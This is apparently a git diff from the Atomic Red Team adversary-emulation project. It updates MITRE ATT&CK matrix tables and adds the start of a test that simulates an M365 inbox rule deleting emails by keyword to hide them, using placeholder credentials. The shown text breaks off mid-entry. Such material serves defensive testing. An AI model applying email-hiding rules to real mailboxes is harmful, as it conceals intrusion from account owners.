Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
 | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -7,7 +7,7 @@
 | Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -13,7 +13,7 @@
 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -10,7 +10,7 @@
 | [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -876,7 +876,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -951,7 +951,59 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
-    atomic_tests: []
+      identifier: T1564.008
+    atomic_tests:
+    - name: New-Inbox Rule to Hide E-mail in M365
+      auto_generated_guid: 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9
+      description: |
+        This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body.
+         Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        auth_username:
+          description: M365 Username
+          type: string
+          default: john@contoso.com
+        auth_password:
